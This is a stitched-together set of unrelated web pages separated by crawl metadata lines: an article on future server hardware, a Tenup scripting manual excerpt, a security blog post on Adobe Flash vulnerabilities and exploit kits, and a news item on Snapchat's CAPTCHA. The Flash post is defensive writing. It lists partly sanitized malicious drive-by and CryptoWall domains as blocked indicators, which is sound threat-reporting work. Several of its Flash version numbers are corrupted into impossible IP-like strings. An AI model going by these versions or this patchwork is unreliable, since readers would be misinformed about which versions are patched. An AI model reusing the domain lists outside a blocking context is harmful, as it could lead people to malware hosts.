I have submitted my proposal to this initiative at : http://www.nstic.ideascale.com/a/dtd/Protecting-Online-Transactions-and-Sensitive-Data-Files-with-Malware-resilient-Software-as-a-Service./45573-9351
Your comments are welcome. | <urn:uuid:e69176b1-31c6-4119-bbb4-fcff78caa3ac> | CC-MAIN-2017-04 | http://www.infosecisland.com/blogview/8042-Cybercrime-Victims-Feel-Ripped-Off.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285289.45/warc/CC-MAIN-20170116095125-00317-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.900854 | 749 | 2.515625 | 3 |
Future Systems: What Will Tomorrow’s Server Look Like?
February 4, 2016 Timothy Prickett Morgan
We can talk about storage and networking as much as we want, and about how the gravity of data bends infrastructure to its needs, but the server – or a collection of them loosely or tightly coupled – is still the real center of the datacenter.
Data is useless unless you process it, after all. As more than a few companies that have built data lakes as a knee jerk reaction have come to realize.
The server is where organizations spend the bulk of their budgets when they build platforms – excepting, of course, the vast sums they lavish on writing or procuring their applications. We are old enough to remember when what happened in glass houses was called data processing, not the more vague information technology, and we would point out that what the industry calls a datacenter should, properly speaking, probably called a data processing center.
We are not snobs about the computing aspects of data processing here at The Next Platform, and we are certainly not prejudiced against storage or networking as is attested in our broad and deep coverage on all three aspects of a modern system. We are well aware of the fact that moving data from the slowest storage tiers of tape cartridges and disk drives up through networks and main memory and caches in the system out to the central processing units of servers is one of the more complex engineering dances ever orchestrated by humanity. And we suspect that very few people can see an entire system in their heads, even if they built them.
The View From Outside The Glass House
It is fun sometimes to just step back and really consider how complex something like a banking application or a weather simulation or a social media network serving over a billion and a half people truly is. And if you really want to blow your mind, try making the connections between systems within companies and then connections across companies and consumers over the Internet. Perhaps the only accurate metaphor, given this, is to call the entire Earth a data processing center. Any alien looking down from the outside of the atmosphere would clearly see that humanity is on the cusp of adding intelligence to the automation systems we have been gradually building since the advent of computing in the wake of World War II. It started with card-walloping mainframes doing bookkeeping and it is evolving into a massively sensored and, at some emergent level that might be short of consciousness we hope, self-regulating systems.
And still, beneath all of these layers and behind all of these interconnections, at the heart of it are some 40 million servers, chewing on all that data as their applications make the economy dance or entertain us with myriad distractions.
As we look to new processing, storage, and interconnect technologies and the architectures that will weave them together into systems, we can’t help but wonder if the servers that enterprises buy in a year, or two, or three will bear much of a resemblance to the ones they are accustomed to buying today. Many have predicted radical shifts in the past, and some occurred, such as the rise and ubiquity of X86 machines and the fall of proprietary minicomputers and Unix systems in the datacenter. And some have not. The advent of wimpy-cored microservers or the demise of the mainframe come to mind. Prediction is almost as difficult as invention.
We will be talking to experts over the course of this series of stories, and we are merely setting the stage here for those experts to speak, much as we did last year with the Future Systems series we did relating to high performance computing architectures. (See the bottom of this story for the Related Items section for links to those articles.) We will start with some general observations about the core components of the server and the general trends for their innovation, and we welcome your input and comments as this article series evolves.
It is not much of an exaggeration to say that a modern processor socket looks like a complete multiprocessing system implemented in silicon with main memory and other forms of storage externalized. Multicore processing came to RISC processors in 2001 beginning with the Power4 chip from IBM, and Sun Microsystems and Hewlett Packard followed suit. Intel got its first dual-core Xeons into the field in 2005, and since that time not only has the company done major microarchitectural shifts, such as adopting cores aimed at laptops in its servers, but it has ramped up the core count while at the same time bringing PCI-Express peripheral controllers and Ethernet networking interfaces onto the processor itself. With the Xeon D chips, Intel is bringing the chipset that links to peripherals (called the southbridge) onto the package, and it won’t be long before FPGA accelerators will be brought onto the die. (We think this might also be with a Xeon D chip that was created for hyperscalers, but that is just a guess.)
Here we are, at the dawn of the “Broadwell” Xeon v4 generation, where E5 processors will have up to 22 cores and E7s will have up to 24 cores according to the Intel roadmaps that The Next Platform got ahold of last May, we are starting to run out of processing increases coming from increasing core counts much as we hit the clock speed wall back in the early 2000s that led us down the road to multicore chips in the first place. And with the “Skylake” Xeon v5 generation, it looks like Intel will push the core count of the top bin processors up to 28 cores, according to those roadmaps, with all kinds of innovations wrapped around them. The cores are getting moderately faster with each generation, too, and the floating point performance has been much more radically increased as well in recent Xeon generations, but it is hard to imagine software that will be able to harness all of the compute in systems beyond that and future servers would seem to be ideal for workload consolidation but in terms of raw processing per thread, we cannot expect much in the way of performance increases. We will have to juggle more work across more threads and drive up utilization, and the threads will only get faster at a nominal rate between generations on the order 5 percent to 10 percent.
There are only a few other CPUs that matter in the datacenter. A handful of ARM chips from upstarts like AMD, Applied Micro, Broadcom, Cavium, and Qualcomm, some of which are starting to ramp now but none of which has scored a big win yet that can count as a tipping point in the server market. IBM’s Power8 chip is trying to follow ARM with a licensing and proliferation approach, and is counting on adoption in China to drive volumes much as the ARM collective is doing. The ARM collective is hoping to capture 25 percent share of server shipments by 2020, and IBM’s top brass similarly aspire for the OpenPower platform to attain 10 percent to 20 percent market share. These are both lofty aims, and both camps are depending on heavy adoption in China, which is facing a number of economic challenges at the moment. The Sparc processors from Oracle and Sparc64 chips from Fujitsu still count, too, and by 2017, AMD will have its “Zen” CPUs in field as well, if all goes as planned.
But for now, the motor of choice for compute is the Xeon E5 processor and it is the one to beat. This is Intel’s market to lose, and it will take something truly radical to alter the market dynamics here. Intel is not exactly sitting still. Interestingly, Intel is positioning its future “Purley” platforms using the Skylake Xeons to consolidate the Xeon E5 and Xeon E7 lines to simplify server design for OEM and ODM partners and as well as customers who craft their own gear. The Purley platforms using Skylake Xeons will scale from two to four to eight sockets all with one processor family, socket design, and memory architecture, which has not been the case before. The Xeon E7s have had a different socket and memory design, and while this has added performance and scale, it has added costs. Intel has figured out how to accomplish its scale and reliability goals with a single, unified Xeon line, according to the roadmaps we have seen, which should make it all that more difficult for those peddling four-socket and larger systems to afford their differentiation. Intel will be working with third parties – presumably Hewlett Packard Enterprise, SGI, and NEC – to offer scalability beyond eight sockets for these future Skylake Xeons.
Aside from all of that, it is amazing to ponder just how much work a two-socket Xeon server with 56 cores and a few terabytes of mixed DRAM and 3D XPoint memory plus flash drives linked by NVM-Express links will be able to do. The node counts in clusters might actually go down if those cores can be kept fed and the machines run at high utilization. Which brings us to the exciting bit in future servers.
Memory And Storage
This is where the real action is. The addition of flash memory to radically expand I/O operations for data transfers and to lower latencies was just the first step in the transformation of the server. Looking ahead, Intel will be supplying memory sticks and drives for servers based on 3D XPoint memory, with the flash drives coming first this year and the memory sticks in 2017 possibly in conjunction with the Skylake servers. These machines, like the Haswell and Broadwell Xeon servers that preceded them, will also support DDR4 main memory, and Micron will also be peddling NVDIMM DRAM/flash hybrids as well SanDisk UlltraDIMM and Diablo Technologies Memory1 technologies. And PCI-Express flash cards and NVM-Express flash drives are going to continue to see wider adoption as capacities increase and prices come down.
Looking further out, we can expect to see stacked memory such as the Hybrid Memory Cube techniques developed by Micron and Intel and High Bandwidth Memory (HBM) approaches pushed by AMD, SK Hynix, Samsung, and Nvidia to appear in servers that are more hungry for memory bandwidth than memory capacity. This will probably not happen until these techniques are perfected for video card, accelerators, and network devices first. Intel’s “Knights Landing” has a variant of on-package memory inspired by HMC welded to its compute, and Nvidia’s future “Pascal” tesla coprocessors will have HBM as well. We have no idea when an ARM or Power or Xeon processor will get similar HBM or HMC memories, but as we have quipped in the past, we think the future server compute module will look more like a video card than a server motherboard.
The main thing to contemplate is that the memory hierarchy will be getting richer and deeper, and memories of various kinds will be pulled closer to the CPU complex in a server. This will presumably have dramatic impacts on the utilization of CPUs and how much work can be pushed through the system at a given price. Forgetting that last part – at a given price – is sometimes hard in the excitement around new technologies. But weighing those different memory technologies against each other – in a raw sense as well as when running real applications – and taking into account their price/performance will be a real challenge for IT organizations. So will be writing applications that know the difference between and can take advantage of the wide variety of volatile and non-volatile memories that will be available in future servers. That’s why we will be talking to the experts about the possibilities.
PCI Express And Network I/O
With the advent of non-volatile memory that comes in a DRAM form factor, hooking a reasonable slice of persistent memory into a server with very fast access is going to be a fairly simple affair. The rest of the I/O devices crammed into or hanging off the server will have to get to the CPU through PCI-Express interfaces, proprietary interfaces like IBM’s Coherent Accelerator Processor Interface (CAPI) for Power8 chips or like Nvidia’s NVLink with its Pascal Tesla cards, or Ethernet or InfiniBand network interfaces.
Every new generation of processor, storage, and networking has its challenges, and PCI-Express has certainly had those and, in fact, that is why IBM’s CAPI and NVidia’s NVLink were invented. PCI-Express 1.0 was launched in 2003 with devices able to push data at 2 Gb/sec (250 MB/sec) per lane each way, and in 2007 that was bumped up with PCI-Express 2.0 to 4 Gb/sec lanes (500 MB/sec). With PCI-Express 3.0 in 2010, the speed was doubled up again, with lanes running at 8 Gb/sec (1 GB/sec). Development on the PCI-Express 4.0 spec started in earnest in 2011, with another doubling up of bandwidth to 16 Gb/sec per lane (which is 2 GB/sec), and many had hoped to see it come to market in 2016, but it is looking more like it will take until 2017 or more before the first products come to market. The Skylake Xeons, tellingly, will sport PCI-Express 3.0 controllers and peripherals when they come out, probably in late 2017.
The question we have is whether the CPU memory bus and PCI-Express 3.0 peripheral bus will be up to the extra demands that will be put in them by processors with more cores and cache and all of those myriad memory and storage devices. It will be interesting to see how the system architects build their iron. | <urn:uuid:f83eafa7-dbf8-48bc-8bac-615bf512c3ab> | CC-MAIN-2017-04 | https://www.nextplatform.com/2016/02/04/future-systems-what-will-tomorrows-server-look-like/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279189.36/warc/CC-MAIN-20170116095119-00227-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953916 | 2,830 | 2.53125 | 3 |
Since the most powerful uses of Tenup all have to do with automation, in a way all the previous sections of this manual have led us to this moment. Here, we will learn how to customize your Tenup settings so that it knows certain information about your account. This will allow you to include less information in each command. Finally, we will look at how to use Tenup to build and run shell scripts. In Windows, a shell script is called a Batch File. Batch files always end in a .bat file extension.
In Mac OS X and Linux, shell scripts go by a few different names, but both Shell Script or Bash Script are appropriate. Shell script files in Mac OS X and Linux end in the .sh file extension.
Shell scripts are extremely useful. They allow you to write many commands in a single file that will be executed in the order in which they appear. Often, these commands work together, each command using the results of the one that preceded it to accomplish a task that would be difficult or impossible with a single command. However, you can create a shell script that runs a series of completely unrelated commands as well. This section will detail the concepts and best practices needed for writing shell scripts that contain multiple Tenup commands. | <urn:uuid:d30aad13-0a5b-421d-8bed-b5b20212fae3> | CC-MAIN-2017-04 | https://www.1010data.com/downloads/tenup/doc/AutomatingTenup.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280425.43/warc/CC-MAIN-20170116095120-00043-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952365 | 256 | 2.515625 | 3 |
Adobe Flash vulnerabilities – a never-ending string of security risks
You, me and millions other people in the world use Flash Player. To most of us, it’s a necessity and we don’t pay much attention to it, because it’s that thing that runs in the background that some apps need in order to work.
But here’s why you should care:
Adobe Flash is one of the preferred methods that cyber criminals use to attack users worldwide!
You might wonder why, so I’m going to take you on a short and informative ride through its troubled history, showing how all this affects you specifically.
Here are some numbers to start you off with:
- more than 500 million devices are addressable today with Flash technology, and it is projected there will be over 1 billion addressable devices by the end of 2015.
- more than 20,000 apps in mobile markets, like the Apple App Store and Google Play, are built using Flash technology.
- 24 of the top 25 Facebook games are built using Flash technology. The top 9 Flash technology enabled games in China generate over US$70 million a month.
- More than 3 million developers use the Adobe Flash technology to create engaging interactive and animated web content.
But here’s the worrying statistic of the set that Adobe provides:
- More than 400 million connected desktops update to the new version of Flash Player within six weeks of release.
Six weeks is a very long time when it comes to cyber security. In six weeks, millions of Flash users can be compromised. And the worst part is that many of them actually do become victims of cyber attacks.
Do you know how many Adobe Flash vulnerabilities were identified in the past 6 weeks?
The answer is 30. And out of those 30 security vulnerabilities, 16 were critical: they allowed information exposure, let attackers bypass intended access restrictions and obtain sensitive information via unspecified vectors, or made it possible to execute arbitrary code.
Translation: vulnerabilities in the code provided cyber criminals with the opportunity to infiltrate their own code into the victims’ computers. From there, they could do pretty much what they want, including collecting your login data, your credit card information or encrypting your computer and asking a hefty ransom.
But what does Flash actually do and why do we need it?
Adobe created Flash (formerly called Macromedia Flash and Shockwave Flash) as a platform that allows developers to create vector graphics, animation, browser games, rich Internet applications, desktop applications, mobile applications and mobile games.
Here’s what Flash can do:
- Display text and graphics to provide animations, video games and applications
- Allows audio and video streaming
- Can capture mouse, keyboard, microphone and camera input.
It can do lots of other things as well, but you probably already got the idea:
Flash is deeply ingrained in your web browser, your applications, and the websites you use every day.
- Flash Player is used on 110 million websites aka 11% of all the websites in the world!
- Adobe Air, also built in Flash, reaches more than 1 billion connected desktops!
- Adobe Reader is used by 2.9 million customers worldwide.
And all of them are constantly exposed to vulnerabilities which turn into cyber threats which, more often than not, turn into full-blown cyber attacks.
Let’s see how the number of Flash vulnerabilities has evolved in the past decade:
As you can see from the statistics, this year the number of security vulnerabilities in Flash has skyrocketed:
In 2014, it had a total of 76 vulnerabilities, but since the 1st of January 2015 it’s amassed 94!
Here’s a breakdown of these by type:
- 32 vulnerabilities allowed DoS attacks – attackers could execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
- 68 vulnerabilities allowed code execution from malicious sources.
- 17 vulnerabilities allowed overflow – an anomaly in which a program violates memory safety. A buffer overflow can modify how a program works, which may result in erratic program behavior, including memory access errors, incorrect results, crashes, or breaches of system security.
- 28 vulnerabilities allowed memory corruption, as discussed above.
- 18 vulnerabilities allowed cyber criminals to bypass security restrictions and gain access to the victim’s computer and resources.
- 13 vulnerabilities allowed attackers to gain information from the victims’ computers.
And these types of threats can sometimes be combined to incur even more damage.
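To see how these categories relate to the 94 total, here is a minimal Python sketch using only the counts listed above (the labels are shorthand, not official CVE classifications). The sum of the categories is far larger than 94 precisely because one vulnerability often falls into several of them:

```python
# Category counts for the 2015 Flash vulnerabilities listed above.
# One CVE can appear in several categories, so the sum exceeds the
# 94 distinct vulnerabilities reported since January 1st, 2015.
TOTAL_2015 = 94

categories = {
    "Denial of service": 32,
    "Code execution": 68,
    "Overflow": 17,
    "Memory corruption": 28,
    "Bypass": 18,
    "Information disclosure": 13,
}

for name, count in categories.items():
    print(f"{name:<24} {count:>3}  ({count / TOTAL_2015:.0%} of the year's total)")

print(f"Sum of category counts: {sum(categories.values())} (> {TOTAL_2015}, because categories overlap)")
```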
Can’t software developers use other, more secure platforms?
For a long time, Flash has been the platform of choice. Now developers can choose to use HTML 5 as an alternative, but this option hasn’t gained enough popularity to oust Flash as market leader.
And chances are, as another platform will become the go-to solution for developers, it will suffer the same fate as Flash.
But let’s see how things actually work:
So how do cyber criminals actually use Flash vulnerabilities against me?
The more complex software gets, the more security holes it has. It’s as simple as that.
This is a simple version of how things happen in real life:
A vulnerability or more are discovered.
The software maker, in this case Adobe, works on an update to fix it.
They release the update – sometimes relatively fast, because users are sure targets for cyber attacks – and more bugs appear.
And this loop NEVER ends.
Here’s how cyber criminals use vulnerabilities in Flash or other software to penetrate your system:
That’s why we insist that unpatched software is a huge security threat. By ignoring cyber threats and allowing vulnerabilities to exist, we’re fueling the malware economy, which is impacting all of us.
Cyber criminals have a number of approaches they use when targeting their victims:
- They can infiltrate advertising networks that deliver banners and infect those banners (which sometimes are displayed on healthy, normal websites)
- They can infect browser games
- They can be PDF documents that exploit vulnerabilities in readers, such as Adobe Reader, to drop ransomware or other types of malware
- They can penetrate desktop applications – and the list goes on.
To put it bluntly: they can be anywhere, without you ever knowing it.
Why most exploit kits target Flash and go undetected ‘till it’s too late
One of the most common methods of infection that cyber criminals use are exploit kits.
An exploit kit is a toolkit that automates the exploitation of client-side vulnerabilities, targeting browsers and programs that a website can invoke through the browser.
Here are the most heavily used exploit kits of 2014, according to Trustwave Global Security Report 2015:
And the award for most exploited application in 2014 goes to…. Adobe Flash!
With a whopping 33.2% share, Flash makes it to the top of the list, becoming a favorite vector for cyber attacks. The reason is, of course, the never-ending string of vulnerabilities presented at the beginning of this article.
And there’s another important aspect to it. Exploit kits are incredibly popular tools in the malware market! Cyber security specialist Lenny Zeltser explains why:
A key characteristic of an exploit kit is the ease with which it can be used even by attackers who are not IT or security experts. The attacker doesn’t need to know how to create exploits to benefit from infecting systems. Further, an exploit pack typically provides a user-friendly web interface that helps the attacker track the infection campaign.
Some exploit kits offer capabilities for remotely controlling the exploited system, allowing the attacker to create an Internet crimeware platform for further malicious activities.
Furthermore, exploit kits pose a serious challenge to traditional cyber security products, such as antivirus.
Antivirus can’t protect you from advanced exploit kits. Find out what can!
The thing is antivirus can’t protect you against these highly advanced exploit kits, because they sometimes never place a single file on your system. Since antivirus employs a file-detection system to identify a threat or an infection, it won’t be able to block an exploit kit such as Angler.
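To make that limitation concrete, here is a simplified Python sketch of what file-based detection boils down to (the hash in the "signature set" is a dummy value, not a real signature). A scanner built on this idea can only catch a payload that is actually written to disk; an exploit kit that keeps its code in the browser's memory never gives it a file to hash:

```python
import hashlib

# Dummy "signature database" of known-bad SHA-256 hashes (illustrative only).
KNOWN_BAD_SHA256 = {"0" * 64}

def is_known_malware(path: str) -> bool:
    """Hash a file on disk and look it up in the signature set."""
    sha256 = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            sha256.update(chunk)
    return sha256.hexdigest() in KNOWN_BAD_SHA256

# A fileless exploit never becomes a file we could pass to is_known_malware(),
# which is exactly why this approach misses it.
```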
There are, of course, next generation anti-hacking tools that can help you enhance your protection against sophisticated threats, so I recommend you test them to see what fits your needs best.
Hot topic: the Zero Day vulnerability problem
Exploits kits are especially dangerous when they go after Zero Day vulnerabilities. A Zero Day vulnerability is a security hole in software that is unknown to the software vendor. That means that cyber criminals can exploit that hole before any updates that can fix it are released.
Here’s the Zero Day scenario, as depicted in the 2015 Trustwave Global Security Report:
If you want to go online protected from Zero Hour exploits and exploit kits in general, I recommend using a mix of security products that includes:
- an antivirus solution
- a product that ensures anti-exploit protection
- a security product that filters your Internet traffic for threats (and blocks them before reaching your system)
- and a patching tool that delivers updates as soon as they’re available!
Some of these products can be found standalone, and some of them include these features bundled, so taking the time to do a bit of research could save you a lot of trouble in the future.
When it comes to Flash, it also has a history of Zero Day vulnerabilities that’s not something to ignore. In fact, the last Zero Day vulnerability to make headlines happened just last week!
The latest vulnerability in Flash Player: Magnitude exploit kit integrates Flash Player vulnerability
It’s only been 4 days since the latest critical security update released by Adobe, and another misfortune brings Flash’s security problems up again.
The attack bypasses the majority of all traditional antivirus solutions, as well as a large number of gateways and security appliances, which the payload can slip past.
This leaves vulnerable installations open to several types of penetration and system manipulation:
- total information disclosure, resulting in all system files being revealed
- total compromise of system integrity – there is a complete loss of system protection, resulting in the entire system being compromised
- total shutdown of the affected resource – by which the attacker can render the resource completely unavailable
- very little knowledge or skill is required to exploit this security vulnerability
- authentication is not required to exploit the vulnerability.
Among the many campaigns which make use of the Magnitude exploit kit, there is one that’s particularly active and extensive in scope. The campaign is delivered through a variety of dedicated drive-by domains, which we have already blocked through the Heimdal Secure DNS. A small selection can be found below (sanitized by Heimdal Security):
carcs [.] in
pure wide [.] in
waypassed [.] in
Volume weeks [.] in
foodpartys [.] in
notedvalid [.] in
comingjumps [.] in
holiday final [.] in
inputtedhole [.] in
sidesmanuals [.] in
trace windows [.] in
childrenopens [.] in
lecturescause [.] in
quietlygrowth [.] in
station status [.] in
userssuspends [.] in
citizen seconds [.] in
The above are FQDNs (fully qualified domain names), but the campaign is designed with thousands of subdomains. The payload is delivered by determining which country the client comes from.
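For readers curious what blocking these domains at the DNS level means in practice, here is a hedged Python sketch of the matching logic such a filter can apply, using a couple of the sanitized domains above as stand-ins for a real blocklist. Matching on the registered domain is what lets a single entry cover the thousands of subdomains the campaign generates:

```python
from urllib.parse import urlparse

# Stand-ins taken from the sanitized list above; a real blocklist would
# hold the full, unsanitized domains and far more of them.
BLOCKED_DOMAINS = {"carcs.in", "notedvalid.in", "childrenopens.in"}

def is_blocked(hostname: str) -> bool:
    """True if the hostname is a blocked domain or any subdomain of one."""
    hostname = hostname.lower().rstrip(".")
    return any(
        hostname == domain or hostname.endswith("." + domain)
        for domain in BLOCKED_DOMAINS
    )

def should_block_url(url: str) -> bool:
    return is_blocked(urlparse(url).hostname or "")

print(should_block_url("http://ads.notedvalid.in/landing"))  # True
print(should_block_url("http://example.com/"))               # False
```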
Read ahead for guidelines that you can use to protect yourself from these types of vulnerabilities.
UPDATE: 03.07.2015: A new and previously undocumented vulnerability that exists in multiple versions of Adobe Flash Player has been reported by several sources, including Fortinet.
Heimdal Security has analyzed the exploit, and can confirm that it is different from previous exploits we have looked at.
The vulnerability is, however, patched with the latest security update from Adobe. This means that Adobe Flash Player version 18.104.22.168 and newer are not vulnerable. All vulnerable versions have long been patched for Heimdal users.
As it appears from Fortinet’s blog and from our technical review, this is a different exploit than the ones we have observed in the past. A spraying vector is used in combination with a GlowFilter object and an established safety circumvention known as the “CFG bypass”.
The exploit was recorded in the Magnitude exploit kit, a commercial exploit kit that we have also seen delivering Cryptowall3 and Pony to vulnerable machines in Denmark.
The exploit achieves only very limited antivirus detection (5/55) and is transported to the client through script injections on legitimate web pages and through malvertising.
A small sample of the CryptoWall distribution domains are reproduced below (sanitized by Heimdal Security):
microforgeandfitting [.] in
magaligilbert [.] com
matheusprado [.] net
loccidigital.com [.] br
noivasefestas [.] net
vllusionshop [.] org
loveyourneighbortour [.] com
mundofomix [.] com
mevtutorial [.] in
mduinfo [.] com
phulwaribiotech [.] com
ppinvesting [.] me
klovertel [.] com
All domains have already been blocked in the Heimdal Secure DNS.
As already mentioned, the exploit has a low AV detection (5/55), as we can see from the Virus Total page.
UPDATE: 09.07.2015: It's only been 6 days since Adobe had to publish a critical security update for Flash Player. Now, less than a week later, they have to do it again.
This derives from a 0-day vulnerability which was leaked after the breach of the Italian security company "Hacking Team", exposing a so-far unknown flaw in the popular and widely used media player. We are therefore dealing with a 0-day vulnerability for which a complete proof of concept is available.
The published exploit is confirmed to work on Windows 7 with a fully patched version of Flash Player. The vulnerability can be exploited by embedding code on a website which victims are tricked into visiting. Upon visiting the website, the exploit is run and the arbitrary code executes with the same rights as the logged-in user.
The exploit was part of a package in the surveillance tool “Da Vinci” that was published last weekend after the controversial company was hacked.
The vulnerability is called CVE-2015-5119. It exists in Adobe Flash Player version 22.214.171.124 and all older versions for Windows and Macintosh. It also appears in Adobe Flash Player version 126.96.36.1998 and all older versions on Linux.
Heimdal has already deployed an update that automatically patches all vulnerable installations. You can also consult the latest Adobe Security Bulletin for more details.
So how do you protect yourself from cyber threats targeting Adobe Flash?
If you’ve read this blog before, you must’ve heard this plenty of times. Still, here it goes again:
Keep your software updated at all times!
Now there are 2 ways you can do this:
If you choose to update your software manually, you should never ignore an update prompt!
But what if you’re somewhere where you have limited Internet access?
Or click away the update window?
Or turn off your computer by mistake, run out of battery, etc., etc.?
Then you should choose option number 2. Automatic updates can be delivered via the Flash product itself or through various applications that have Flash built-in, such as Google Chrome.
The easiest way, however, is to use a patching application, that will update not only Flash, but also other vulnerable software on your system, such as browsers. You’ll never have to worry about another update again!
Also, since exploits use your browser most of the time, make sure you secure it properly. You can use the advice in this guide to enhance your browser’s protection and give you a bit more peace of mind.
Of course, you should always use the appropriate security products that offer a multi-layered protection. One product can’t solve all security problems, and there are plenty of those, as you’ve read.
But is there another possible solution?
Can you live without Flash?
Yes, you can, but you might find it annoying if you’re used to having everything ready to go.
Security specialist Brian Krebs did an experiment earlier this month and tried to go without Flash Player for a month.
In almost 30 days, I only ran into just two instances where I encountered a site hosting a video that I absolutely needed to watch and that required Flash (an instructional video for a home gym that I could find nowhere else, and a live-streamed legislative hearing).
Moreover, Brian Krebs suggests another 2 possible solutions for those who want to be safe and use Flash Player once in a while, when they really, really have to.
If you decide that removing Flash altogether or disabling it until needed is impractical, there are in-between solutions. Script-blocking applications like Noscript and ScriptSafe are useful in blocking Flash content, but script blockers can be challenging for many users to handle.
Another approach is click-to-play, which is a feature available for most browsers (except IE, sadly) that blocks Flash content from loading by default, replacing the content on Web sites with a blank box. With click-to-play, users who wish to view the blocked content need only click the boxes to enable Flash content inside of them (click-to-play also blocks Java applets from loading by default).
In hindsight, Steve Jobs' decision to give up Flash was very appropriate, although it may not have seemed so to many at the time.
The ongoing debate over the death or near-death of Flash might take some time to unfold, and Flash may even recover from its current state – who knows? Oracle's Java used to be the main vector used by cyber criminals, and now 14.5% of exploits target it – which is not great, but it's not disastrous either.
But until Flash’s security increases, we should all be cautious. Using free software may sometimes cost you your privacy or security, or both. Don’t let that be the case.
Keep your software up to date, use the appropriate cyber security tools and keep an eye out for trouble. That’s what you need to enjoy everything that the web has to offer! | <urn:uuid:4ca0cea4-9b94-4868-9c76-b8252af7fc91> | CC-MAIN-2017-04 | https://heimdalsecurity.com/blog/adobe-flash-vulnerabilities-security-risks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281450.93/warc/CC-MAIN-20170116095121-00345-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.919461 | 3,875 | 2.625 | 3 |
Much to the chagrin of any kids who grow up idolizing astronauts, the start of the 21st century has marked an era of cutbacks for NASA. The space shuttle program shut down in 2011. A year later, Congress trimmed NASA’s overall budget appropriation by $648 million. Now that the Constellation program has lost its funding, prospects look bleak for sending astronauts back to the moon. In 1980, the United States had 100 percent of the global rocket launch capability. That share dropped to zero several years ago, but is now inching back up, thanks to private space flight.
The dismal outlook is a far cry from the heady days of the 1960s. It was then, just three years after NASA was created in 1958, that President John F. Kennedy issued his famous directive declaring that by the end of the decade the United States would send a man to the moon and bring him home safely.
NASA has radically scaled back, but space travel survives. How? In the face of fiscal constraints, the agency has changed its role. For the United States, space exploration is evolving from a government-led venture to a rich collaboration with the private sector.
As NASA has reduced its commitments, a dynamic private sector space ecosystem has sprung up vigorously to fill the void, with the agency's strong support. Richard Branson's Virgin Galactic, for example, is developing a spacecraft to launch tourists into orbit and facilitate at least $4.5 million in NASA research contracts, prompting New Mexico to build a $209 million spaceport. Blue Origin, led by Amazon.com founder and chief executive Jeff Bezos, is developing space vehicles designed to launch and land on retractable legs. A startup called NanoRacks helps scientists who need zero-gravity environments transport their experiments to the International Space Station.
Many other companies, including Orbital Sciences, XCOR Aerospace, and Boeing, are testing vehicles for space travel. NASA is helping Moon Express Inc. develop robots to search the moon for precious metals. XCOR Aerospace is developing a two-seater Lynx vehicle to shuttle passengers to space for $95,000 a trip. Space Adventures has already sent seven people to the International Space Station from a Soviet-era launch facility in Kazakhstan.
One of the most interesting players in the new space ecosystem is SpaceX, of Hawthorne, Calif. SpaceX has more than $3 billion in contracts for more than 30 launches, including $1.6 billion from NASA. Its unmanned Dragon capsule docked on the space station in May 2012, in what was likely one of many supply runs to come.
Launched in 2002 by Elon Musk, the co-founder of PayPal and Tesla Motors, SpaceX intends to vastly reduce the cost of space ventures. “Today it costs over a billion dollars for a space shuttle flight,” Musk says. “The cost . . . is fundamentally what’s holding us back from becoming a space traveling civilization and ultimately a multiplanet species.”
Surprisingly, NASA feels no sense of rivalry with these emerging space entrepreneurs. "We have an enlightened self-interest in seeing the industry players do well," explains Joe Parrish, NASA's deputy chief technologist. Not only has the agency welcomed the new players in space, but it has also radically reengineered its own business model to take advantage of outside innovation. This approach sets NASA apart from most other government agencies.
“Partnering with U.S. companies such as SpaceX to provide cargo and eventually crew service to the International Space Station is a cornerstone of the president’s plan for maintaining America’s leadership in space,” says John P. Holdren, assistant to the president for science and technology. “This expanded role for the private sector will free up more of NASA’s resources to do what NASA does best—tackle the most demanding technological challenges in space, including those of human space flight beyond low Earth orbit.”
NASA shows how an organization can nimbly adapt to resource constraints, offering the following lessons for agencies shifting roles within their fields:
- Instead of seeing new entrants as a threat, consider potential win-win scenarios that also yield public value.
- Support the development of platforms and exchanges that enable different providers to work together toward solving the big problems that affect everyone. You can’t begin to think about ways to combine capabilities with partners unless you know who they are and their specialties, a process that platforms can simplify.
- Get creative about the resources you can bring to the emerging ecosystem and that will provide a springboard for solutions. Perhaps it is funding, or convening a multidisciplinary team of wavemakers or something as simple as physical space for early-stage innovators to experiment side by side.
Pooling these disparate resources will reinforce that there’s more support available for problem-solving than one solitary approach. This awareness boosts not only your organization’s morale, but also the chance of reaching a solution.
William D. Eggers, leader of public sector research at Deloitte, and Paul Macmillan, the global public sector leader for Deloitte Touche Tohmatsu, are the authors of The Solution Revolution: How Business, Government, and Social Enterprises are Teaming up to Solve Society’s Toughest Problems (Harvard Business Press, 2013), which was released on Tuesday. | <urn:uuid:8a5b8bd0-7846-46a3-ab84-13ba60cdc6b2> | CC-MAIN-2017-04 | http://www.nextgov.com/emerging-tech/2013/09/analysis-nasas-new-role-partner/70468/?oref=ng-HPriver | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00161-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.942234 | 1,110 | 3.265625 | 3 |
Snapchat has demonstrated again its lack of understanding in building strong security to protect users of its popular mobile app for sharing photos.
The company introduced last week a CAPTCHA verification method for checking whether a new subscriber is human or a computer program. Cybercriminals will use the latter to set up fake accounts in order to distribute spam or to find ways to steal the personal information of users of the service.
CAPTCHA methods can help reduce the number of fake accounts, but Snapchat's implementation was easily hacked by Steven Hickson, a graduate research assistant at the Georgia Institute of Technology.
In fact, Snapchat's CAPTCHA was so weak, Hickson spent less than an hour building a computer program that could fool the mobile app maker's system with "100 percent accuracy."
"They're a very, very new company and I think they're just lacking the personnel to do this kind of thing," Hickson told CSOonline Monday.
To ensure the would-be user is human, the Snapchat system asks the registrant to choose out of nine illustrations the ones containing Snapchat's white ghost mascot. The problem with the system is that the mascot image varies only in size and angle, making it easy for a computer to find.
To avoid hacking a CAPTCHA system, "you want something that has a lot of variety in the answer," Hickson said. "Basically, one right answer, but a very, very large amount of wrong answers. You want something that's very, very hard for a computer to solve."
